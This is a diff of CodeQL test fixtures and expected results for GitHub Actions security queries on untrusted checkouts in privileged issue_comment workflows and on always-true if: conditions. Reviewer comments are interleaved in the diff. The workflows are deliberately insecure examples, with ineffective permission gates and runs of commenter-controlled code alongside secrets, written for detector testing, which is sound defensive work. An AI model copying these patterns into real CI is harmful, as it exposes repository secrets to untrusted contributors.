+ email="${{ github.actor }}@github.com"
+ echo "email=$email" >> $GITHUB_OUTPUT
+
+ - name: Lookup Slack ID
+ id: slack-id
+ env:
+ SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }}
+ run: |
+ slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id')
+ echo "slack-id=$slack_id" >> $GITHUB_OUTPUT
+
+ - name: Submit pipeline kickoff message to slack
+ id: slack-initiate
+ uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0
+ with:
+ channel-id: 'C05N5U3HH2M' # platform-health-ml-ops
+ payload: |
+ {
+ "blocks": [
+ {
+ "type": "section",
+ "text": {
+ "type": "mrkdwn",
+ "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..."
+ }
+ }
+ ]
+ }
+ env:
+ SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }}
+
+ - name: Environment setup
+ uses: ./.github/actions/setup-env
+ with:
+ azure_creds: ${{ secrets.AZURE_CREDENTIALS }}
+
+ - name: Kickoff run
+ if: contains(github.event.comment.body, '/kickoff')
+ env:
+ BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }}
+
+ - name: Set latest commit status as ${{ job.status }}
+ uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1
+ if: always()
+ with:
+ sha: ${{ steps.comment-branch.outputs.head_sha }}
+ token: ${{ secrets.GITHUB_TOKEN }}
+ status: ${{ job.status }}
+
+ - name: Report pipeline's run outcome to slack
+ uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0
+ if: always()
+ with:
+ channel-id: 'C05N5U3HH2M' # platform-health-ml-ops
+ payload: |
+ {
+ "blocks": [
+ {
+ "type": "section",
+ "text": {
+ "type": "mrkdwn",
+ "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*"
+ }
+ }
+ ]
+ }
+ env:
+ SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }}
+
+ - name: Prune docker images
+ run: docker system prune --all --force
diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected
new file mode 100644
index 000000000000..da66ff822a39
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected
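Review bot: The `security-checks` gate at the top of this fixture compares `github.event.pull_request.author_association` against `FIRST_TIMER`/`FIRST_TIME_CONTRIBUTOR`/`MANNEQUIN`/`NONE`, but the workflow is triggered by `issue_comment`, whose payload carries `issue` and `comment` rather than a top-level `pull_request`, so those four `!=` checks compare an empty value with a string and pass for every commenter; the only effective filters are `comment.user.type != 'Bot'` and the allow-list step. That appears to be the intended shape of the test — the expected output reports the `setup-env` and `Kickoff run` steps after the `head_ref` checkout as insufficiently protected — but nothing in the file says so, and a later maintainer could "fix" the gate and silently change what the test exercises. A leading comment such as `# Fixture: author_association is absent on issue_comment payloads, so this gate is ineffective; the head_ref checkouts below are expected findings.` would pin the intent; since the `.expected` files reference line numbers, add it together with regenerated expectations.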
@@ -0,0 +1,109 @@ +edges +| .github/workflows/actor.yml:17:9:20:6 | Uses Step | .github/workflows/actor.yml:20:9:21:16 | Run Step | +| .github/workflows/comment.yml:13:9:28:6 | Uses Step: issue | .github/workflows/comment.yml:28:9:32:6 | Uses Step | +| .github/workflows/comment.yml:28:9:32:6 | Uses Step | .github/workflows/comment.yml:32:9:34:2 | Run Step | +| .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | +| .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | +| .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | +| .github/workflows/deployment1.yml:16:10:22:7 | Uses Step | .github/workflows/deployment1.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment1.yml:22:10:27:7 | Uses Step | .github/workflows/deployment1.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment1.yml:27:10:30:7 | Run Step | .github/workflows/deployment1.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment2.yml:16:10:22:7 | Uses Step | .github/workflows/deployment2.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment2.yml:22:10:27:7 | Uses Step | .github/workflows/deployment2.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment2.yml:27:10:30:7 | Run Step | .github/workflows/deployment2.yml:30:10:31:53 | Run Step | +| .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | +| .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | +| .github/workflows/test0.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test0.yml:28:9:32:6 | Uses Step | +| .github/workflows/test0.yml:28:9:32:6 | Uses Step | .github/workflows/test0.yml:32:9:34:2 | Run Step | +| .github/workflows/test0.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test0.yml:54:9:58:6 | Uses Step | +| 
.github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | +| .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | +| .github/workflows/test1.yml:32:7:47:4 | Run Step | .github/workflows/test1.yml:47:7:86:4 | Run Step: environment | +| .github/workflows/test1.yml:47:7:86:4 | Run Step: environment | .github/workflows/test1.yml:86:7:92:4 | Uses Step | +| .github/workflows/test1.yml:86:7:92:4 | Uses Step | .github/workflows/test1.yml:92:7:95:54 | Uses Step | +| .github/workflows/test2.yml:38:7:41:4 | Uses Step | .github/workflows/test2.yml:41:7:44:4 | Run Step | +| .github/workflows/test2.yml:41:7:44:4 | Run Step | .github/workflows/test2.yml:44:7:58:4 | Run Step | +| .github/workflows/test2.yml:44:7:58:4 | Run Step | .github/workflows/test2.yml:58:7:76:2 | Run Step: environment | +| .github/workflows/test2.yml:90:7:94:4 | Uses Step: comment-branch | .github/workflows/test2.yml:94:7:101:4 | Uses Step | +| .github/workflows/test2.yml:94:7:101:4 | Uses Step | .github/workflows/test2.yml:101:7:105:4 | Uses Step | +| .github/workflows/test2.yml:101:7:105:4 | Uses Step | .github/workflows/test2.yml:105:7:111:4 | Uses Step | +| .github/workflows/test2.yml:105:7:111:4 | Uses Step | .github/workflows/test2.yml:111:7:135:4 | Run Step: environment | +| .github/workflows/test2.yml:111:7:135:4 | Run Step: environment | .github/workflows/test2.yml:135:7:141:4 | Run Step: email | +| .github/workflows/test2.yml:135:7:141:4 | Run Step: email | .github/workflows/test2.yml:141:7:149:4 | Run Step: slack-id | +| .github/workflows/test2.yml:141:7:149:4 | Run Step: slack-id | .github/workflows/test2.yml:149:7:169:4 | Uses Step: slack-initiate | +| .github/workflows/test2.yml:149:7:169:4 | Uses Step: slack-initiate | .github/workflows/test2.yml:169:7:174:4 | Uses Step | +| .github/workflows/test2.yml:169:7:174:4 | Uses Step | .github/workflows/test2.yml:174:7:187:4 | Run Step | +| 
.github/workflows/test2.yml:174:7:187:4 | Run Step | .github/workflows/test2.yml:187:7:198:4 | Run Step | +| .github/workflows/test2.yml:187:7:198:4 | Run Step | .github/workflows/test2.yml:198:7:206:4 | Uses Step | +| .github/workflows/test2.yml:198:7:206:4 | Uses Step | .github/workflows/test2.yml:206:7:226:4 | Uses Step | +| .github/workflows/test2.yml:206:7:226:4 | Uses Step | .github/workflows/test2.yml:226:7:227:45 | Run Step | +| .github/workflows/test3.yml:38:7:56:4 | Run Step: environment | .github/workflows/test3.yml:56:7:60:4 | Uses Step: comment-branch | +| .github/workflows/test3.yml:56:7:60:4 | Uses Step: comment-branch | .github/workflows/test3.yml:60:7:65:4 | Uses Step | +| .github/workflows/test3.yml:60:7:65:4 | Uses Step | .github/workflows/test3.yml:65:7:68:4 | Uses Step | +| .github/workflows/test3.yml:65:7:68:4 | Uses Step | .github/workflows/test3.yml:68:7:83:2 | Run Step | +| .github/workflows/test3.yml:106:7:110:4 | Uses Step: comment-branch | .github/workflows/test3.yml:110:7:115:4 | Uses Step | +| .github/workflows/test3.yml:110:7:115:4 | Uses Step | .github/workflows/test3.yml:115:7:120:4 | Uses Step | +| .github/workflows/test3.yml:115:7:120:4 | Uses Step | .github/workflows/test3.yml:120:7:127:4 | Run Step | +| .github/workflows/test3.yml:120:7:127:4 | Run Step | .github/workflows/test3.yml:127:7:131:4 | Run Step | +| .github/workflows/test3.yml:127:7:131:4 | Run Step | .github/workflows/test3.yml:131:7:136:4 | Run Step | +| .github/workflows/test3.yml:131:7:136:4 | Run Step | .github/workflows/test3.yml:136:7:141:2 | Run Step | +| .github/workflows/test3.yml:169:7:173:4 | Uses Step: comment-branch | .github/workflows/test3.yml:173:7:180:4 | Uses Step | +| .github/workflows/test3.yml:173:7:180:4 | Uses Step | .github/workflows/test3.yml:180:7:185:4 | Uses Step | +| .github/workflows/test3.yml:180:7:185:4 | Uses Step | .github/workflows/test3.yml:185:7:197:4 | Run Step: pipeline-info | +| .github/workflows/test3.yml:185:7:197:4 | Run 
Step: pipeline-info | .github/workflows/test3.yml:197:7:203:4 | Run Step: email | +| .github/workflows/test3.yml:197:7:203:4 | Run Step: email | .github/workflows/test3.yml:203:7:211:4 | Run Step: slack-id | +| .github/workflows/test3.yml:203:7:211:4 | Run Step: slack-id | .github/workflows/test3.yml:211:7:231:4 | Uses Step: slack-initiate | +| .github/workflows/test3.yml:211:7:231:4 | Uses Step: slack-initiate | .github/workflows/test3.yml:231:7:236:4 | Uses Step | +| .github/workflows/test3.yml:231:7:236:4 | Uses Step | .github/workflows/test3.yml:236:7:242:4 | Run Step | +| .github/workflows/test3.yml:236:7:242:4 | Run Step | .github/workflows/test3.yml:242:7:250:4 | Uses Step | +| .github/workflows/test3.yml:242:7:250:4 | Uses Step | .github/workflows/test3.yml:250:7:270:4 | Uses Step | +| .github/workflows/test3.yml:250:7:270:4 | Uses Step | .github/workflows/test3.yml:270:7:271:45 | Run Step | +| .github/workflows/test4.yml:32:7:47:4 | Run Step | .github/workflows/test4.yml:47:7:79:4 | Run Step: environment | +| .github/workflows/test4.yml:47:7:79:4 | Run Step: environment | .github/workflows/test4.yml:79:7:85:4 | Uses Step | +| .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | +| .github/workflows/test5.yml:38:7:41:4 | Uses Step | .github/workflows/test5.yml:41:7:44:4 | Run Step | +| .github/workflows/test5.yml:41:7:44:4 | Run Step | .github/workflows/test5.yml:44:7:58:2 | Run Step | +| .github/workflows/test5.yml:72:7:76:4 | Uses Step: comment-branch | .github/workflows/test5.yml:76:7:83:4 | Uses Step | +| .github/workflows/test5.yml:76:7:83:4 | Uses Step | .github/workflows/test5.yml:83:7:87:4 | Uses Step | +| .github/workflows/test5.yml:83:7:87:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | +| .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:93:7:117:4 | Run Step: environment | +| .github/workflows/test5.yml:93:7:117:4 | Run Step: environment | 
.github/workflows/test5.yml:117:7:123:4 | Run Step: email | +| .github/workflows/test5.yml:117:7:123:4 | Run Step: email | .github/workflows/test5.yml:123:7:131:4 | Run Step: slack-id | +| .github/workflows/test5.yml:123:7:131:4 | Run Step: slack-id | .github/workflows/test5.yml:131:7:151:4 | Uses Step: slack-initiate | +| .github/workflows/test5.yml:131:7:151:4 | Uses Step: slack-initiate | .github/workflows/test5.yml:151:7:156:4 | Uses Step | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:180:7:188:4 | Uses Step | +| .github/workflows/test5.yml:180:7:188:4 | Uses Step | .github/workflows/test5.yml:188:7:208:4 | Uses Step | +| .github/workflows/test5.yml:188:7:208:4 | Uses Step | .github/workflows/test5.yml:208:7:209:45 | Run Step | +| .github/workflows/test6.yml:38:7:42:4 | Uses Step: comment-branch | .github/workflows/test6.yml:42:7:47:4 | Uses Step | +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | .github/workflows/test6.yml:47:7:50:4 | Uses Step | +| .github/workflows/test6.yml:47:7:50:4 | Uses Step | .github/workflows/test6.yml:50:7:65:2 | Run Step | +| .github/workflows/test6.yml:88:7:92:4 | Uses Step: comment-branch | .github/workflows/test6.yml:92:7:97:4 | Uses Step | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | .github/workflows/test6.yml:97:7:102:4 | Uses Step | +| .github/workflows/test6.yml:97:7:102:4 | Uses Step | .github/workflows/test6.yml:102:7:109:4 | Run Step | +| .github/workflows/test6.yml:102:7:109:4 | Run Step | .github/workflows/test6.yml:109:7:113:4 | Run Step | +| .github/workflows/test6.yml:109:7:113:4 | Run Step | .github/workflows/test6.yml:113:7:118:4 | Run Step | +| .github/workflows/test6.yml:113:7:118:4 | Run Step | .github/workflows/test6.yml:118:7:123:2 | Run 
Step | +| .github/workflows/test6.yml:151:7:155:4 | Uses Step: comment-branch | .github/workflows/test6.yml:155:7:162:4 | Uses Step | +| .github/workflows/test6.yml:155:7:162:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | +| .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:167:7:179:4 | Run Step: pipeline-info | +| .github/workflows/test6.yml:167:7:179:4 | Run Step: pipeline-info | .github/workflows/test6.yml:179:7:185:4 | Run Step: email | +| .github/workflows/test6.yml:179:7:185:4 | Run Step: email | .github/workflows/test6.yml:185:7:193:4 | Run Step: slack-id | +| .github/workflows/test6.yml:185:7:193:4 | Run Step: slack-id | .github/workflows/test6.yml:193:7:213:4 | Uses Step: slack-initiate | +| .github/workflows/test6.yml:193:7:213:4 | Uses Step: slack-initiate | .github/workflows/test6.yml:213:7:218:4 | Uses Step | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:224:7:232:4 | Uses Step | +| .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | +| .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | +#select +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). 
| .github/workflows/comment.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test0.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test4.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). 
| .github/workflows/test5.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref new file mode 100644 index 000000000000..f924f8fe750c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref @@ -0,0 +1 @@ +Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected new file mode 100644 index 000000000000..4f7149b69803 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected @@ -0,0 +1,2 @@ +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow ($@). | .github/workflows/test6.yml:5:3:5:15 | issue_comment | issue_comment | 
diff --git a/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref
new file mode 100644
index 000000000000..6284c786b3ae
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref
@@ -0,0 +1 @@
+Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml
new file mode 100644
index 000000000000..bbbcc5aaa791
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml
@@ -0,0 +1,111 @@
+name: Event
+
+on:
+ workflow_dispatch:
+
+jobs:
+ if-tests:
+ runs-on: ubuntu-latest
+ permissions: {}
+ steps:
+ - name: Test 1
+ if: 1 == 2
+ run: echo "Test 1 should not be printed"
+ - name: Test 2
+ if: |
+ ${{
+ 1 == 2 ||
+ 3 == 4
+ }}
+ run: echo "Test 2 should not be printed"
+ - name: Test 3
+ if: ${{ 1 == 2 }}
+ run: echo "Test 3 should not be printed"
+ - name: Test 4
+ if: ${{ 1 == 2 }}
+ run: echo "Test 4 should not be printed"
+ - name: Test 5
+ if: ${{
+ 1 == 2 ||
+ 3 == 4
+ }}
+ run: echo "Test 5 should not be printed"
+ - name: Test 6
+ if: ${{ 1 == 1 }} ${{ 1 == 2 }}
+ run: echo "Test 6 should not be printed"
+ - name: Test 7
+ run: echo "Test 7 should not be printed"
+ if: ${{
+ 1 == 2 ||
+ 3 == 4
+ }}
+
+ - name: Test 8
+ run: echo "Test 8 should not be printed"
+ if: >
+ ${{
+ 1 == 2 ||
+ 3 == 4 }}
+ - name: Test 9
+ if: '${{ 1 == 2 }}'
+ run: echo "Test 9 should not be printed"
+ - name: Test 10
+ if: "${{1 == 2 }}"
+ run: echo "Test 10 should not be printed"
+ - name: Test 11
+ if: " ${{ 1 == 2 }}"
+ run: echo "Test 11 should not be printed"
+ - name: Test 12
+ if: " ${{ 1 == 2 }}"
+ run: echo "Test 12 should not be printed"
+ - name: Test 13
+ if: |
+ 1 == 2 ||
+ 3 == 4
+ run: echo "Test 13 should not be printed"
+ - name: Test 14
+ if: >-
+ ${{(
+ false || 1 == 2
+ )}}
+ run: echo "Test 14 should not be printed"
+ - name: Test 15
+ if: |-
+ ${{(
+ false || 1 == 2
+ )}}
+ run: echo "Test 15 should not be printed"
+ - name: Test 16
+ if: |+
+ ${{(
+ false || 1 == 2
+ )}}
+ run: echo "Test 16 should not be printed"
+ - name: Test 17
+ if: >+
+ ${{(
+ false || 1 == 2
+ )}}
+ run: echo "Test 17 should not be printed"
+ - name: Test 18
+ if: ${{ github.event_name }} == 'foo'
+ run: echo "Test 18 should not be printed"
+ - name: Test 19
+ if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo'
+ run: echo "Test 19 should not be printed"
+ - name: Test 20
+ if: ${{ hashFiles('./docker/Dockerfile.debian') }} != ""
+ run: echo "Test 20 should not be printed"
+ - name: Test 21
+ if: >
+ ${{ github.event.workflow_run.event == 'pull_request' &&
+ github.event.workflow_run.conclusion == 'success' }}
+ run: echo "Test 21 should not be printed"
+ - name: Test 22
+ if: |
+ runner.os == 'Windows' && (
+ startsWith(inputs.node, 'v10.') ||
+ startsWith(inputs.node, 'v12.') ||
+ startsWith(inputs.node, 'v14.')
+ )
+ run: echo "Test 22 should not be printed"
diff --git a/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml
new file mode 100644
index 000000000000..8b863037e29b
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml
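Review bot: Every step's `run:` line says "should not be printed", yet for the eleven cases the accompanying `ExpressionIsAlwaysTrueHigh.expected` marks as "always evaluates to true" (Tests 2, 6, 8, 11, 12, 16–21 by line number) the `if:` value becomes a non-empty string once the `${{ }}` fragments are interpolated — e.g. Test 6 yields the string `true false` and Test 18 yields `false == 'foo'` — so those steps do run and the message contradicts the fixture's own expectation. Labelling the always-true cases, e.g. `run: echo "Test 6 runs: if value is the string 'true false'"`, makes the fixture self-describing and lets a regression be spotted in the YAML rather than only in the `.expected` diff. Because the expectations carry line and column positions, keep any annotation on the existing `run:` line (or regenerate the `.expected` files in the same change) so the reported `if:` locations do not shift.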
@@ -0,0 +1,111 @@
+name: Event
+
+on:
+ workflow_dispatch:
+
+jobs:
+ if-tests:
+ runs-on: ubuntu-latest
+ permissions: {}
+ steps:
+ - name: Test 1
+ if: github.actor == "foo"
+ run: echo "Test 1 should not be printed"
+ - name: Test 2
+ if: |
+ ${{
+ github.actor == "foo" ||
+ 3 == 4
+ }}
+ run: echo "Test 2 should not be printed"
+ - name: Test 3
+ if: ${{ github.actor == "foo" }}
+ run: echo "Test 3 should not be printed"
+ - name: Test 4
+ if: ${{ github.actor == "foo" }}
+ run: echo "Test 4 should not be printed"
+ - name: Test 5
+ if: ${{
+ github.actor == "foo" ||
+ 3 == 4
+ }}
+ run: echo "Test 5 should not be printed"
+ - name: Test 6
+ if: ${{ 1 == 1 }} ${{ github.actor == "foo" }}
+ run: echo "Test 6 should not be printed"
+ - name: Test 7
+ run: echo "Test 7 should not be printed"
+ if: ${{
+ github.actor == "foo" ||
+ 3 == 4
+ }}
+
+ - name: Test 8
+ run: echo "Test 8 should not be printed"
+ if: >
+ ${{
+ github.actor == "foo" ||
+ 3 == 4 }}
+ - name: Test 9
+ if: '${{ github.actor == "foo" }}'
+ run: echo "Test 9 should not be printed"
+ - name: Test 10
+ if: "${{ github.actor == 111 }}"
+ run: echo "Test 10 should not be printed"
+ - name: Test 11
+ if: " ${{ github.actor == 111 }}"
+ run: echo "Test 11 should not be printed"
+ - name: Test 12
+ if: " ${{ github.actor == 111 }}"
+ run: echo "Test 12 should not be printed"
+ - name: Test 13
+ if: |
+ github.actor == "foo" ||
+ 3 == 4
+ run: echo "Test 13 should not be printed"
+ - name: Test 14
+ if: >-
+ ${{(
+ false || github.actor == "foo"
+ )}}
+ run: echo "Test 14 should not be printed"
+ - name: Test 15
+ if: |-
+ ${{(
+ false || github.actor == "foo"
+ )}}
+ run: echo "Test 15 should not be printed"
+ - name: Test 16
+ if: |+
+ ${{(
+ false || github.actor == "foo"
+ )}}
+ run: echo "Test 16 should not be printed"
+ - name: Test 17
+ if: >+
+ ${{(
+ false || github.actor == "foo"
+ )}}
+ run: echo "Test 17 should not be printed"
+ - name: Test 18
+ if: ${{ github.actor }} == 'foo'
+ run: echo "Test 18 should not be printed"
+ - name: Test 19
+ if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]'
+ run: echo "Test 19 should not be printed"
+ - name: Test 20
+ if: ${{ github.actor }} != ""
+ run: echo "Test 20 should not be printed"
+ - name: Test 21
+ if: >
+ ${{ github.actor == 'foo' &&
+ github.event.workflow_run.conclusion == 'success' }}
+ run: echo "Test 21 should not be printed"
+ - name: Test 22
+ if: |
+ runner.os == 'Windows' && (
+ startsWith(inputs.node, 'v10.') ||
+ startsWith(inputs.node, 'v12.') ||
+ startsWith(inputs.node, 'v14.')
+ )
+ run: echo "Test 22 should not be printed"
diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected
new file mode 100644
index 000000000000..2ef457d9e01a
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected
@@ -0,0 +1,11 @@ +| .github/workflows/test2.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test2.yml:34:13:34:54 | ${{ 1 = ... foo" }} | Expression always evaluates to true | +| .github/workflows/test2.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test2.yml:56:15:56:44 | " ${{ g ... 11 }}" | Expression always evaluates to true | +| .github/workflows/test2.yml:59:15:59:44 | " ${{ g ... 11 }}" | Expression always evaluates to true | +| .github/workflows/test2.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test2.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test2.yml:91:13:91:40 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test2.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | +| .github/workflows/test2.yml:97:13:97:37 | ${{ git ... } != "" | Expression always evaluates to true | +| .github/workflows/test2.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref new file mode 100644 index 000000000000..823f802a70f2 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected new file mode 100644 index 000000000000..c853603377cf --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected 
